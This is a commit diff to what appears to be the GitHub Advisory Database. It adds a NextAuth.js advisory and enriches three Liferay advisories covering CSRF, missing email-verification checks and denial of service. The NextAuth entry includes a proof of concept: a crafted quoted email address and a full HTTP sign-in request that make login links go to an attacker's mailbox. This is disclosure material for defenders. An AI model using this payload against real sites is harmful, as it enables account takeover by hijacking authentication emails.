Publish Advisories

advisory-database[bot] · advisory-database[bot] · commit 5573d3e3a258 · 2025-10-29T10:45:48.000Z
GHSA-5jpx-9hw9-2fx4 GHSA-gh4w-8qgq-8w9r GHSA-gv7w-jh8g-vr73 GHSA-vgqx-447m-wvcj
diff --git a/advisories/github-reviewed/2025/10/GHSA-5jpx-9hw9-2fx4/GHSA-5jpx-9hw9-2fx4.json b/advisories/github-reviewed/2025/10/GHSA-5jpx-9hw9-2fx4/GHSA-5jpx-9hw9-2fx4.json
@@ -0,0 +1,82 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-5jpx-9hw9-2fx4",
+  "modified": "2025-10-29T10:43:58Z",
+  "published": "2025-10-29T10:43:57Z",
+  "aliases": [],
+  "summary": "NextAuthjs Email misdelivery Vulnerability",
+  "details": "### Summary\n\nNextAuth.js's email sign-in can be forced to deliver authentication emails to an attacker-controlled mailbox due to a bug in `nodemailer`'s address parser used by the project (fixed in `nodemailer` **v7.0.7**). A crafted input such as:\n\n```\n\"e@attacker.com\"@victim.com\n```\n\nis parsed incorrectly and results in the message being delivered to `e@attacker.com` (attacker) instead of `\"<e@attacker.com>@victim.com\"` (the intended recipient at `victim.com`) in violation of RFC 5321/5322 semantics. This allows an attacker to receive login/verification links or other sensitive emails intended for the victim.\n\n<h2>Affected NextAuthjs Version</h2>\n\n≤ Version | Afftected\n-- | --\n4.24.11 | Yes\n5.0.0-beta.29 | Yes\n\n\n## POC\n\nExample Setup showing misdelivery of email \n\n```jsx\nimport NextAuth from \"next-auth\"\nimport Nodemailer from \"next-auth/providers/nodemailer\"\nimport { PrismaAdapter } from \"@auth/prisma-adapter\"\nimport { prisma } from \"@/lib/prisma\"\n\nexport const { handlers, auth, signIn, signOut } = NextAuth({\n  adapter: PrismaAdapter(prisma),\n  providers: [\n    Nodemailer({\n      server: {\n        host: \"127.0.0.1\",\n        port: 1025,\n        ...\n      },\n      from: \"noreply@authjs.dev\",\n    }),\n  ],\n  pages: {\n    signIn: '/auth/signin',\n    verifyRequest: '/auth/verify-request',\n  },\n})\n\n```\n\n```jsx\nPOST /api/auth/signin/nodemailer HTTP/1.1\nAccept-Encoding: gzip, deflate, br, zstd\nCache-Control: no-cache\nConnection: keep-alive\nContent-Length: 176\nDNT: 1\nHost: localhost:3000\nOrigin: http://localhost:3000\nPragma: no-cache\nReferer: http://localhost:3000/auth/signin\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36\naccept: */*\naccept-language: en-US,en;q=0.9,ta;q=0.8\ncontent-type: application/x-www-form-urlencoded\nsec-ch-ua: \"Google Chrome\";v=\"141\", \"Not?A_Brand\";v=\"8\", \"Chromium\";v=\"141\"\nsec-ch-ua-mobile: ?0\nsec-ch-ua-platform: \"Linux\"\nx-auth-return-redirect: 1\n\nemail=%22e%40attacker.coccm%22%40victim.com&csrfToken=90f5e6f48ab577ab011f212011862dcfe546459c23764cf891aab2d176f8d77a&callbackUrl=http%3A%2F%2Flocalhost%3A3000%2Fauth%2Fsignin\n```\n\n<img width=\"1247\" height=\"1408\" alt=\"Screenshot from 2025-10-25 21-15-25\" src=\"https://github.com/user-attachments/assets/456968a3-14ce-42b4-b8ca-f25b9351cf0f\" />\n<img width=\"1279\" height=\"1450\" alt=\"Screenshot from 2025-10-25 21-14-47\" src=\"https://github.com/user-attachments/assets/4e665b66-9bfe-43ce-abd3-97880972218f\" />\n\n# Mitigation\n\nUpdate to nodemailer 7.0.7\n\n## Credits\n\nhttps://zeropath.com/  Helped identify this security issue",
+  "severity": [
+    {
+      "type": "CVSS_V4",
+      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "npm",
+        "name": "next-auth"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "4.24.12"
+            }
+          ]
+        }
+      ]
+    },
+    {
+      "package": {
+        "ecosystem": "npm",
+        "name": "next-auth"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "5.0.0-beta.0"
+            },
+            {
+              "fixed": "5.0.0-beta.30"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/nextauthjs/next-auth/security/advisories/GHSA-5jpx-9hw9-2fx4"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/nextauthjs/next-auth/commit/82efcf81f218aae43683f8dd2f7c260ef69b3ece"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/nextauthjs/next-auth/commit/8f3b2c7af0fe08973a12f616517c3ec85a5cd172"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/nextauthjs/next-auth"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-200"
+    ],
+    "severity": "MODERATE",
+    "github_reviewed": true,
+    "github_reviewed_at": "2025-10-29T10:43:57Z",
+    "nvd_published_at": null
+  }
+}
diff --git a/advisories/github-reviewed/2025/10/GHSA-gh4w-8qgq-8w9r/GHSA-gh4w-8qgq-8w9r.json b/advisories/github-reviewed/2025/10/GHSA-gh4w-8qgq-8w9r/GHSA-gh4w-8qgq-8w9r.json
@@ -1,24 +1,49 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-gh4w-8qgq-8w9r",
-  "modified": "2025-10-28T00:31:26Z",
+  "modified": "2025-10-29T10:44:27Z",
   "published": "2025-10-28T00:31:26Z",
   "aliases": [
     "CVE-2025-62258"
   ],
+  "summary": "Liferay Portal Vulnerable to CSRF in Headless APIs",
   "details": "CSRF vulnerability in Headless API in Liferay Portal 7.4.0 through 7.4.3.107, and Liferay DXP 2023.Q3.1 through 2023.Q3.4, 7.4 GA through update 92, 7.3 GA through update 35, and older unsupported versions allows remote attackers to execute any Headless API via the `endpoint` parameter.",
   "severity": [
     {
       "type": "CVSS_V4",
       "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
     }
   ],
-  "affected": [],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Maven",
+        "name": "com.liferay.portal:release.portal.bom"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "7.4.0-ga1"
+            },
+            {
+              "fixed": "7.4.3.108"
+            }
+          ]
+        }
+      ]
+    }
+  ],
   "references": [
     {
       "type": "ADVISORY",
       "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62258"
     },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/liferay/liferay-portal"
+    },
     {
       "type": "WEB",
       "url": "https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/CVE-2025-62258"
@@ -29,8 +54,8 @@
       "CWE-352"
     ],
     "severity": "HIGH",
-    "github_reviewed": false,
-    "github_reviewed_at": null,
+    "github_reviewed": true,
+    "github_reviewed_at": "2025-10-29T10:44:26Z",
     "nvd_published_at": "2025-10-27T23:15:38Z"
   }
 }
diff --git a/advisories/github-reviewed/2025/10/GHSA-gv7w-jh8g-vr73/GHSA-gv7w-jh8g-vr73.json b/advisories/github-reviewed/2025/10/GHSA-gv7w-jh8g-vr73/GHSA-gv7w-jh8g-vr73.json
@@ -1,24 +1,49 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-gv7w-jh8g-vr73",
-  "modified": "2025-10-28T00:31:26Z",
+  "modified": "2025-10-29T10:44:39Z",
   "published": "2025-10-28T00:31:26Z",
   "aliases": [
     "CVE-2025-62259"
   ],
+  "summary": "Liferay Portal Does Not Limit Access to APIs Before Email Verification",
   "details": "Liferay Portal 7.4.0 through 7.4.3.109, and older unsupported versions, and Liferay DXP 2023.Q3.1 through 2023.Q3.4, 7.4 GA through update 92, 7.3 GA through update 35, and older unsupported versions does not limit access to APIs before a user has verified their email address, which allows remote users to access and edit content via the API.",
   "severity": [
     {
       "type": "CVSS_V4",
       "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
     }
   ],
-  "affected": [],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Maven",
+        "name": "com.liferay.portal:release.portal.bom"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "7.4.0-ga1"
+            },
+            {
+              "fixed": "7.4.3.110"
+            }
+          ]
+        }
+      ]
+    }
+  ],
   "references": [
     {
       "type": "ADVISORY",
       "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62259"
     },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/liferay/liferay-portal"
+    },
     {
       "type": "WEB",
       "url": "https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/CVE-2025-62259"
@@ -29,8 +54,8 @@
       "CWE-863"
     ],
     "severity": "MODERATE",
-    "github_reviewed": false,
-    "github_reviewed_at": null,
+    "github_reviewed": true,
+    "github_reviewed_at": "2025-10-29T10:44:39Z",
     "nvd_published_at": "2025-10-27T23:15:38Z"
   }
 }
diff --git a/advisories/github-reviewed/2025/10/GHSA-vgqx-447m-wvcj/GHSA-vgqx-447m-wvcj.json b/advisories/github-reviewed/2025/10/GHSA-vgqx-447m-wvcj/GHSA-vgqx-447m-wvcj.json
@@ -1,24 +1,57 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-vgqx-447m-wvcj",
-  "modified": "2025-10-28T00:31:26Z",
+  "modified": "2025-10-29T10:44:49Z",
   "published": "2025-10-28T00:31:26Z",
   "aliases": [
     "CVE-2025-62260"
   ],
+  "summary": "Liferay Portal Vulnerable to DoS via Crafted Headless API Request",
   "details": "Liferay Portal 7.4.0 through 7.4.3.99, and Liferay DXP 2023.Q3.1 through 2023.Q3.4, 7.4 GA through update 92, 7.3 GA through update 35, and older unsupported versions does not limit the number of objects returned from Headless API requests, which allows remote attackers to perform denial-of-service (DoS) attacks on the application by executing a request that returns a large number of objects.",
   "severity": [
     {
       "type": "CVSS_V4",
       "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
     }
   ],
-  "affected": [],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Maven",
+        "name": "com.liferay.portal:release.portal.bom"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "7.4.0-ga1"
+            },
+            {
+              "fixed": "7.4.3.100"
+            }
+          ]
+        }
+      ]
+    }
+  ],
   "references": [
     {
       "type": "ADVISORY",
       "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62260"
     },
+    {
+      "type": "WEB",
+      "url": "https://github.com/liferay/liferay-portal/commit/5f5c73913b0e7287f7de0b4e19987cc57844b691"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/liferay/liferay-portal"
+    },
+    {
+      "type": "WEB",
+      "url": "https://liferay.atlassian.net/browse/LPE-17800"
+    },
     {
       "type": "WEB",
       "url": "https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/CVE-2025-62260"
@@ -29,8 +62,8 @@
       "CWE-400"
     ],
     "severity": "HIGH",
-    "github_reviewed": false,
-    "github_reviewed_at": null,
+    "github_reviewed": true,
+    "github_reviewed_at": "2025-10-29T10:44:49Z",
     "nvd_published_at": "2025-10-27T22:15:41Z"
   }
 }
